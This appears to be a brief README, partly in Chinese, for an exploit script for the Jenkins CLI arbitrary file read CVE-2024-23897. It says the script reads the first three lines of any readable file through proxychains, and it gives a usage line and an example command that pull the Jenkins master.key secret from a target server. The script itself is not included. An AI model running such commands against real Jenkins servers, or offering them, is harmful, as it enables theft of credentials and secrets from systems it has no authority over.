
Jenkins CLI arbitrary read (CVE-2024-23897 applies to versions below 2.442 and LTS 2.426.3)
读取系统上当前用户具有读取权限的任何文件的前3行。 该脚本在内部使用proxychains。
Usage:
python CVE-2024-23897.py <jenkins-cli.jar path> <target URI> <file path>
Example:
python CVE-2024-23897.py /mnt/hgfs/Share/jenkins-cli.jar http://10.10.14.8:8080/ /var/lib/jenkins/secrets/master.key